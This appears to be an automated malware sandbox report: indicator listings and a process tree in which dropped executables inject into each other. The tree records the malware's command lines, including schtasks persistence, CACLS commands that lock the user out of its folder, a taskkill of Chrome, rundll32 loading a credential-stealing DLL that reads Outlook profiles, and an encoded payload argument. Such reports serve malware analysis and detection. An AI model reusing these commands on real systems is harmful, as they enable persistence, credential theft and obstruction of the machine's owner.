Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeDebugPrivilege	2592	ladia.exe
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeDebugPrivilege	4472	AppLaunch.exe
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeDebugPrivilege	1952	vbc.exe
Token: SeShutdownPrivilege	2212
Token: SeCreatePagefilePrivilege	2212
Token: SeCreateTokenPrivilege	4348	mp3studios_97.exe
Token: SeAssignPrimaryTokenPrivilege	4348	mp3studios_97.exe
Token: SeLockMemoryPrivilege	4348	mp3studios_97.exe
Token: SeIncreaseQuotaPrivilege	4348	mp3studios_97.exe
Token: SeMachineAccountPrivilege	4348	mp3studios_97.exe
Token: SeTcbPrivilege	4348	mp3studios_97.exe
Token: SeSecurityPrivilege	4348	mp3studios_97.exe
Token: SeTakeOwnershipPrivilege	4348	mp3studios_97.exe
Token: SeLoadDriverPrivilege	4348	mp3studios_97.exe
Token: SeSystemProfilePrivilege	4348	mp3studios_97.exe
Token: SeSystemtimePrivilege	4348	mp3studios_97.exe
Token: SeProfSingleProcessPrivilege	4348	mp3studios_97.exe
Token: SeIncBasePriorityPrivilege	4348	mp3studios_97.exe
Token: SeCreatePagefilePrivilege	4348	mp3studios_97.exe
Token: SeCreatePermanentPrivilege	4348	mp3studios_97.exe

Suspicious use of FindShellTrayWindow 28 IoCs

Processes:

chrome.exerundll32.exe

pid	process
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
2212
2144	rundll32.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe
4680	chrome.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

pid process

2212
2212
2212

pid	process
2212
2212
2212

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

D7F9.exeD633.exeD980.exenbveek.exeLega.exeDB08.exegntuud.execmd.exe

description	pid	process	target process
PID 2212 wrote to memory of 996	2212		D1CC.exe
PID 2212 wrote to memory of 996	2212		D1CC.exe
PID 2212 wrote to memory of 996	2212		D1CC.exe
PID 2212 wrote to memory of 4476	2212		D392.exe
PID 2212 wrote to memory of 4476	2212		D392.exe
PID 2212 wrote to memory of 4476	2212		D392.exe
PID 2212 wrote to memory of 3180	2212		D633.exe
PID 2212 wrote to memory of 3180	2212		D633.exe
PID 2212 wrote to memory of 3180	2212		D633.exe
PID 2212 wrote to memory of 3492	2212		D7F9.exe
PID 2212 wrote to memory of 3492	2212		D7F9.exe
PID 2212 wrote to memory of 3492	2212		D7F9.exe
PID 2212 wrote to memory of 4628	2212		D980.exe
PID 2212 wrote to memory of 4628	2212		D980.exe
PID 2212 wrote to memory of 4628	2212		D980.exe
PID 3492 wrote to memory of 3996	3492	D7F9.exe	nbveek.exe
PID 3492 wrote to memory of 3996	3492	D7F9.exe	nbveek.exe
PID 3492 wrote to memory of 3996	3492	D7F9.exe	nbveek.exe
PID 3180 wrote to memory of 3932	3180	D633.exe	nbveek.exe
PID 3180 wrote to memory of 3932	3180	D633.exe	nbveek.exe
PID 3180 wrote to memory of 3932	3180	D633.exe	nbveek.exe
PID 2212 wrote to memory of 1884	2212		DB08.exe
PID 2212 wrote to memory of 1884	2212		DB08.exe
PID 2212 wrote to memory of 1884	2212		DB08.exe
PID 4628 wrote to memory of 4472	4628	D980.exe	AppLaunch.exe
PID 4628 wrote to memory of 4472	4628	D980.exe	AppLaunch.exe
PID 4628 wrote to memory of 4472	4628	D980.exe	AppLaunch.exe
PID 4628 wrote to memory of 4472	4628	D980.exe	AppLaunch.exe
PID 3996 wrote to memory of 4388	3996	nbveek.exe	schtasks.exe
PID 3996 wrote to memory of 4388	3996	nbveek.exe	schtasks.exe
PID 3996 wrote to memory of 4388	3996	nbveek.exe	schtasks.exe
PID 4628 wrote to memory of 4472	4628	D980.exe	AppLaunch.exe
PID 3996 wrote to memory of 4064	3996	nbveek.exe	Lega.exe
PID 3996 wrote to memory of 4064	3996	nbveek.exe	Lega.exe
PID 3996 wrote to memory of 4064	3996	nbveek.exe	Lega.exe
PID 4064 wrote to memory of 2272	4064	Lega.exe	gntuud.exe
PID 4064 wrote to memory of 2272	4064	Lega.exe	gntuud.exe
PID 4064 wrote to memory of 2272	4064	Lega.exe	gntuud.exe
PID 1884 wrote to memory of 1308	1884	DB08.exe	DB08.exe
PID 1884 wrote to memory of 1308	1884	DB08.exe	DB08.exe
PID 1884 wrote to memory of 1308	1884	DB08.exe	DB08.exe
PID 1884 wrote to memory of 1308	1884	DB08.exe	DB08.exe
PID 1884 wrote to memory of 1308	1884	DB08.exe	DB08.exe
PID 1884 wrote to memory of 1308	1884	DB08.exe	DB08.exe
PID 1884 wrote to memory of 1308	1884	DB08.exe	DB08.exe
PID 1884 wrote to memory of 1308	1884	DB08.exe	DB08.exe
PID 1884 wrote to memory of 1308	1884	DB08.exe	DB08.exe
PID 1884 wrote to memory of 1308	1884	DB08.exe	DB08.exe
PID 2272 wrote to memory of 4004	2272	gntuud.exe	schtasks.exe
PID 2272 wrote to memory of 4004	2272	gntuud.exe	schtasks.exe
PID 2272 wrote to memory of 4004	2272	gntuud.exe	schtasks.exe
PID 2272 wrote to memory of 408	2272	gntuud.exe	cmd.exe
PID 2272 wrote to memory of 408	2272	gntuud.exe	cmd.exe
PID 2272 wrote to memory of 408	2272	gntuud.exe	cmd.exe
PID 408 wrote to memory of 3972	408	cmd.exe	cmd.exe
PID 408 wrote to memory of 3972	408	cmd.exe	cmd.exe
PID 408 wrote to memory of 3972	408	cmd.exe	cmd.exe
PID 408 wrote to memory of 2644	408	cmd.exe	cacls.exe
PID 408 wrote to memory of 2644	408	cmd.exe	cacls.exe
PID 408 wrote to memory of 2644	408	cmd.exe	cacls.exe
PID 408 wrote to memory of 1836	408	cmd.exe	cacls.exe
PID 408 wrote to memory of 1836	408	cmd.exe	cacls.exe
PID 408 wrote to memory of 1836	408	cmd.exe	cacls.exe
PID 408 wrote to memory of 2636	408	cmd.exe	cmd.exe

outlook_office_path 1 IoCs

Processes:

rundll32.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	rundll32.exe

outlook_win_path 1 IoCs

Processes:

rundll32.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	rundll32.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4800

C:\Users\Admin\AppData\Local\Temp\D1CC.exe
C:\Users\Admin\AppData\Local\Temp\D1CC.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:996

C:\Users\Admin\AppData\Local\Temp\D392.exe
C:\Users\Admin\AppData\Local\Temp\D392.exe
1⤵
- Executes dropped EXE
PID:4476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4476 -s 340
2⤵
- Program crash
PID:4652

C:\Users\Admin\AppData\Local\Temp\D633.exe
C:\Users\Admin\AppData\Local\Temp\D633.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3180

C:\Users\Admin\AppData\Local\Temp\e76728db77\nbveek.exe
"C:\Users\Admin\AppData\Local\Temp\e76728db77\nbveek.exe"
2⤵
- Executes dropped EXE
PID:3932

C:\Users\Admin\AppData\Local\Temp\D7F9.exe
C:\Users\Admin\AppData\Local\Temp\D7F9.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3492

C:\Users\Admin\AppData\Local\Temp\e76728db77\nbveek.exe
"C:\Users\Admin\AppData\Local\Temp\e76728db77\nbveek.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3996

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\e76728db77\nbveek.exe" /F
3⤵
- Creates scheduled task(s)
PID:4388

C:\Users\Admin\AppData\Local\Temp\1000005001\Lega.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\Lega.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4064

C:\Users\Admin\AppData\Local\Temp\6d87dfb3e7\gntuud.exe
"C:\Users\Admin\AppData\Local\Temp\6d87dfb3e7\gntuud.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2272

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\Admin\AppData\Local\Temp\6d87dfb3e7\gntuud.exe" /F
5⤵
- Creates scheduled task(s)
PID:4004

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "Admin:N"&&CACLS "gntuud.exe" /P "Admin:R" /E&&echo Y|CACLS "..\6d87dfb3e7" /P "Admin:N"&&CACLS "..\6d87dfb3e7" /P "Admin:R" /E&&Exit
5⤵
- Suspicious use of WriteProcessMemory
PID:408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6⤵
PID:3972

C:\Windows\SysWOW64\cacls.exe
CACLS "gntuud.exe" /P "Admin:N"
6⤵
PID:2644

C:\Windows\SysWOW64\cacls.exe
CACLS "gntuud.exe" /P "Admin:R" /E
6⤵
PID:1836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6⤵
PID:2636

C:\Windows\SysWOW64\cacls.exe
CACLS "..\6d87dfb3e7" /P "Admin:N"
6⤵
PID:4676

C:\Windows\SysWOW64\cacls.exe
CACLS "..\6d87dfb3e7" /P "Admin:R" /E
6⤵
PID:2420

C:\Users\Admin\AppData\Local\Temp\1000006001\tfujeoq728.exe
"C:\Users\Admin\AppData\Local\Temp\1000006001\tfujeoq728.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3012

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3012 -s 516
6⤵
- Program crash
PID:4268

C:\Users\Admin\AppData\Local\Temp\1000010001\mp3studios_97.exe
"C:\Users\Admin\AppData\Local\Temp\1000010001\mp3studios_97.exe"
5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:4348

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:4952

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
PID:3860

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
6⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4680

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc87a34f50,0x7ffc87a34f60,0x7ffc87a34f70
7⤵
PID:5020

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1596,752882761583186289,1901346707439172786,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1792 /prefetch:8
7⤵
PID:2636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1596,752882761583186289,1901346707439172786,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1640 /prefetch:2
7⤵
PID:636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1596,752882761583186289,1901346707439172786,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2264 /prefetch:8
7⤵
PID:996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1596,752882761583186289,1901346707439172786,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2912 /prefetch:1
7⤵
PID:1868

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1596,752882761583186289,1901346707439172786,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3056 /prefetch:1
7⤵
PID:3740

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1596,752882761583186289,1901346707439172786,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2660 /prefetch:1
7⤵
PID:4268

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1596,752882761583186289,1901346707439172786,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3988 /prefetch:1
7⤵
PID:992

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1596,752882761583186289,1901346707439172786,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4672 /prefetch:8
7⤵
PID:2440

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1596,752882761583186289,1901346707439172786,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4840 /prefetch:8
7⤵
PID:4432

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1596,752882761583186289,1901346707439172786,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5156 /prefetch:8
7⤵
PID:5112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,752882761583186289,1901346707439172786,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5424 /prefetch:8
7⤵
PID:3700

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1596,752882761583186289,1901346707439172786,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4748 /prefetch:8
7⤵
PID:5104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,752882761583186289,1901346707439172786,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5496 /prefetch:8
7⤵
PID:3036

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1596,752882761583186289,1901346707439172786,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5580 /prefetch:8
7⤵
PID:3636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1596,752882761583186289,1901346707439172786,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5588 /prefetch:8
7⤵
PID:4756

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1596,752882761583186289,1901346707439172786,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5596 /prefetch:8
7⤵
PID:5060

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1596,752882761583186289,1901346707439172786,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1
7⤵
PID:1192

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,752882761583186289,1901346707439172786,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5556 /prefetch:8
7⤵
PID:6104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,752882761583186289,1901346707439172786,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2800 /prefetch:8
7⤵
PID:964

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1596,752882761583186289,1901346707439172786,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1052 /prefetch:8
7⤵
PID:5216

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,752882761583186289,1901346707439172786,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2768 /prefetch:8
7⤵
PID:5228

C:\Users\Admin\AppData\Local\Temp\1000012001\Sabotaging.exe
"C:\Users\Admin\AppData\Local\Temp\1000012001\Sabotaging.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5028

C:\Users\Admin\AppData\Local\Temp\1000012001\Sabotaging.exe
C:\Users\Admin\AppData\Local\Temp\1000012001\Sabotaging.exe
6⤵
- Executes dropped EXE
PID:2064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2064 -s 796
7⤵
- Program crash
PID:2144

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
PID:3408

C:\Users\Admin\AppData\Local\Temp\1000013001\pb1109.exe
"C:\Users\Admin\AppData\Local\Temp\1000013001\pb1109.exe"
5⤵
- Executes dropped EXE
PID:5048

C:\Users\Admin\AppData\Local\Temp\1000014001\linda5.exe
"C:\Users\Admin\AppData\Local\Temp\1000014001\linda5.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:4064

C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" 9KMlZZXC.Rv -s
6⤵
- Loads dropped DLL
PID:4236

C:\Users\Admin\AppData\Local\Temp\1000015051\ladia.exe
"C:\Users\Admin\AppData\Local\Temp\1000015051\ladia.exe"
5⤵
- Executes dropped EXE
PID:5160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5160 -s 1212
6⤵
- Program crash
PID:5512

C:\Users\Admin\AppData\Local\Temp\1000016001\19DEC.exe
"C:\Users\Admin\AppData\Local\Temp\1000016001\19DEC.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5240

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
6⤵
PID:5296

C:\Windows\system32\rundll32.exe
"C:\Users\Admin\AppData\Roaming\nsis_unse58150a.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8Fe|AHYANABvGQBy|wBaADAAYwBR|wA2AHgAcABI|i0CWUiD7CjoBP8CAABIg8Qow||MzMxMiUQkGP9IiVQkEEiJTPskCF0BSItEJDBvSIkEJIEBOEhvAL8ISMdEJBAtAet9DoEBEEiDwAGPAd0QgQFASDmWAHMl|p8DiwwkSAPISF+LwUiLTKsBVHsA|wPRSIvKigmI9wjrwWYFZUiLBPslYPPwM8lIi1D|GEg70XQ2SIP|wiBIiwJIO8L|dCpmg3hIGHX|GkyLQFBmQYPvOGt0BxERS3UI|hEQeBAudAVIi78A69VIi0j9AMH+agBAU1VWV0FUv0FVQVZBV10BZv+BOU1aTYv4TP+L8kiL2Q+F|P7z8ExjSTxBgTz|CVBFAAAPheq+8|BBi4QJiPPwhf|ASI08AQ+E1t5qEYO8CYwtAQ+E|cfz8ESLZyBEi|9fHIt3JESLT|8YTAPhTAPZSP8D8TPJRYXJD|uEpPPwTYvEQYv|EEUz0kgD04r|AoTAdB1BwcrvDQ++wPoAAUQD|dC|EXXsQYH6qv|8DXx0DoPBAf9Jg8AEQTvJc|9p68aLwQ+3DP9ORYssi0wD6+90WDPtqhB0UUH7ixTBANMzyYoCf0yLwusPwcnIEXsDyOUQAUGKANUQ|+0zwDP2QTsM+bbgEKYAg8YBg|j|CHLu6wpIi8v|Qf|VSYkE94P9xeQQxAQ7bxhy|a9mAUFfQV5BXb9BXF9eXVszF0jvgexgAWQAi+no|2b+||9IhcAPW4SYdSBMja8BiysQ38gz|+ibfSCNX|8ETI1FRjPSi9|L|1QkaIAgTIuv4A+Ea3UgRagQM|fAi9ORIEiJfCT1IKYgcIAgSIvwD|OES3UgpiBQSI1W|whEjUdASI2M|SSFEUiL2Oh8|a5+II1WSN4gEOIhzPbz8Ohn7yBEiwaN01cIQSCmIFjKIYmEaySAhxLe8|CLDtogj1iJjCRxEQcwkSDo7THvIIucLTJMi12|OkiD+2xIiiAw|0yJZCQ4TIuk7hoyTIlchAGEJNy2hxGGko0RjUdLMIz7JPDz8EmL1Ojp7fwFMIqceDJIjYT+eDJBgPMhjU9s90QwGKQCg+kBdffzgbx4MiFSZXi|dU2LhCT0IjGU+yT4NQHCSDvYcv84g|psdjNEjXtJQPoAlEG4AJgAeqYgQMoi+HQZRLYwvsAxSY1UJGyRIEnfg+hs6GuCMEiL|c6mIHhIhf90Es+LVUJMjjAbMUiN|0wkQP|XSIHEAHQhYSQtCC0B
7⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- outlook_office_path
- outlook_win_path
PID:5608

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5608 -s 660
8⤵
- Program crash
PID:6080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 312
6⤵
- Program crash
PID:5356

C:\Users\Admin\AppData\Local\Temp\1000018001\OtersideMETA.exe
"C:\Users\Admin\AppData\Local\Temp\1000018001\OtersideMETA.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5564

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
6⤵
PID:5636

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
6⤵
PID:5644

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
6⤵
PID:5652

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
6⤵
PID:5668

C:\Windows\SysWOW64\Wbem\wmic.exe
wmic os get Caption
7⤵
PID:5756

C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic path win32_VideoController get name"
7⤵
PID:5836

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
8⤵
PID:5884

C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic cpu get name"
7⤵
PID:5936

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic cpu get name
8⤵
PID:5988

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
6⤵
PID:5660

C:\Users\Admin\AppData\Local\Temp\1000012051\ladia.exe
"C:\Users\Admin\AppData\Local\Temp\1000012051\ladia.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2592 -s 1252
4⤵
- Program crash
PID:2300

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\bf045808586a24\cred64.dll, Main
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
PID:5052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4476 -ip 4476
1⤵
PID:4408

C:\Users\Admin\AppData\Local\Temp\D980.exe
C:\Users\Admin\AppData\Local\Temp\D980.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4628

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 312
2⤵
- Program crash
PID:1520

